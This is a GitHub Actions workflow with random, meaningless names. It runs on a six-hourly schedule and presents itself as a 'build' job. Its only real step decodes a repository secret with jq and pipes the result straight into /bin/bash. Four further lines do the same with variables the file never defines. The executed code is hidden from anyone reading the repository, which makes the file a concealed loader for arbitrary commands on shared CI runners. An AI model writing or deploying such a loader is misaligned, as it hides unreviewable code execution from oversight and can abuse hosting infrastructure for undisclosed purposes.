name: daijiazx

on:
  workflow_dispatch:
  schedule:
    - cron: '24 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: daijiazx
        env:
          qlo160: ${{ secrets.qlo160 }}
        run: |
          echo $qlo160 | jq -r .gqr66 | /bin/bash
          echo $snqnl35082 | jq -r .wz2 | /bin/bash
          echo $k32604 | jq -r .ij2304 | /bin/bash
          echo $odrhd8348 | jq -r .rucbd41484 | /bin/bash
          echo $nbz68 | jq -r .dxn67531 | /bin/bash

